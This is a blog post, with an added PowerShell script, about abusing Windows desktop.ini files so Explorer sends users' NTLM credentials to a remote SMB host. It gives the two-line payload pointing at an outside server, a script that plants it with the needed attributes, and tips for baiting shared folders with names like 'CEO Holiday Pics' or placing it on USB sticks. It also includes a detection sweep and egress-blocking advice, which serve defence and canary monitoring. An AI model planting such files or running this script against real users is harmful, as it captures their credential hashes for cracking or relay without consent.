Malware not needed?

Recently I had a "duh" moment while playing with the "opened folder" canary technique used by canarytokens.org (a thinkst.com project).

One of the canary triggers takes advantage of the way Windows Explorer presents folders to its users: when a folder is opened, Explorer checks for a hidden desktop.ini file in it, and that file tells Explorer how the folder should be displayed (its icon, view preferences and so on).

The canary works by pointing one of those preferences at a remote server that is listening for incoming requests; when Explorer reaches out to fetch the resource, the request arrives at the server and we know the folder has been opened. Very sneaky! (I didn't know about this technique until I was exploring the payloads available on canarytokens.org.)

So I figured: if we point it at a remote location that requires SMB authentication, we know that Windows will automatically send the current user's credentials to that location, so I'll get hashes!

[.ShellClassInfo]
IconResource=\\internetportscan.online\resource.dll

It works! So, if you are ever on a red team and you have access to a shared folder, plant one in there (the folder needs the read-only attribute set for Explorer to honour the desktop.ini, and a read-only share will help the file persist) with a name like PeopleGettingSacked or Movies or CEO Holiday Pics... whatever, you know better than me...

Additionally, if you put the desktop.ini in the root of a USB stick, then as soon as the stick is mounted Windows will open the folder automatically (unless AutoPlay is disabled), actioning the attack.
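Putting the steps above into a script, as an added example that is not from the original post: one function plants the canary (the same two desktop.ini lines as above, plus the file and folder attributes Explorer needs before it will honour them), and a second sweeps a share for desktop.ini files whose icon points at a UNC path, which is what a defender would hunt for. The host names \\fileserver and \\listener.example are placeholders; the listener is whatever you run on the attacker side (a canarytokens server, or an SMB listener that records NTLM authentication).

```powershell
# Added example, not code from the original post. \\listener.example and
# \\fileserver are hypothetical hosts; you must control the listener.

function New-FolderCanary {
    param(
        [Parameter(Mandatory)] [string] $FolderPath,   # folder to bait, e.g. '\\fileserver\share\CEO Holiday Pics'
        [Parameter(Mandatory)] [string] $UncIconPath   # where Explorer fetches the icon, e.g. '\\listener.example\resource.dll'
    )
    if (-not (Test-Path -LiteralPath $FolderPath)) {
        New-Item -ItemType Directory -Path $FolderPath | Out-Null
    }
    # .NET file APIs resolve relative paths against the process directory,
    # so work with the resolved filesystem path from here on.
    $FolderPath = (Resolve-Path -LiteralPath $FolderPath).ProviderPath
    $ini = Join-Path $FolderPath 'desktop.ini'

    # A pre-existing Hidden/System desktop.ini cannot be overwritten in place;
    # drop its attributes before rewriting it.
    if (Test-Path -LiteralPath $ini) {
        (Get-Item -LiteralPath $ini -Force).Attributes = [IO.FileAttributes]::Normal
    }

    # Same two lines as the page's snippet. Explorer loads the icon from the
    # UNC path, which opens an SMB session to that host and authenticates.
    $content = "[.ShellClassInfo]`r`nIconResource=$UncIconPath`r`n"
    [IO.File]::WriteAllText($ini, $content, [Text.Encoding]::Unicode)

    # Explorer only honours desktop.ini when the file is Hidden+System and
    # the folder itself carries the ReadOnly (or System) attribute.
    (Get-Item -LiteralPath $ini -Force).Attributes = [IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::System
    $dir = Get-Item -LiteralPath $FolderPath -Force
    $dir.Attributes = $dir.Attributes -bor [IO.FileAttributes]::ReadOnly
    return $ini
}

function Find-RemoteDesktopIni {
    param([Parameter(Mandatory)] [string[]] $Root)   # shares or folders to sweep
    Get-ChildItem -LiteralPath $Root -Recurse -Force -File -Filter 'desktop.ini' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $iniPath = $_.FullName
            foreach ($line in (Get-Content -LiteralPath $iniPath -ErrorAction SilentlyContinue)) {
                # IconResource is the key used on the page; IconFile is the older
                # equivalent and can point at a UNC path in the same way.
                if ($line -match '^\s*(IconResource|IconFile)\s*=\s*(\\\\[^\s,]+)') {
                    [pscustomobject]@{ DesktopIni = $iniPath; Key = $Matches[1]; Target = $Matches[2] }
                }
            }
        }
}

# Attacker side, from a host with write access to the share:
#   New-FolderCanary -FolderPath '\\fileserver\share\CEO Holiday Pics' -UncIconPath '\\listener.example\resource.dll'
# Defender side, sweep a share for planted files and review any Target that is not a known file server:
#   Find-RemoteDesktopIni -Root '\\fileserver\share' | Format-Table -AutoSize
```

What the listener receives when a user browses into the folder is the NTLM challenge-response for that user's session (NetNTLMv2 on current Windows), which is what gets cracked offline or relayed; the stored hash itself never leaves the client. On the defensive side, the network-level tell is a workstation opening outbound SMB (TCP 445) to a host that is not one of your file servers, and blocking 445/139 egress at the perimeter stops the internet-hosted variant used in the page's snippet, though not a listener placed inside the network.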

I bet this is already being used out there! Very sneaky/powerful; I had to share. In fact I can't help thinking this might be a very well known thing and I'm out of the loop -_-

I think there is some caching of the desktop.ini too (at least with Windows 10), as when I ejected my evil USB I could still see incoming requests from my machine. Will follow up on that.


An in-depth look at the options available when writing a desktop.ini file, possibly more opportunities for trouble? https://hwiegman.home.xs4all.nl/desktopini.html

Attacker & user view: https://www.youtube.com/watch?v=t8zqJm5d8gg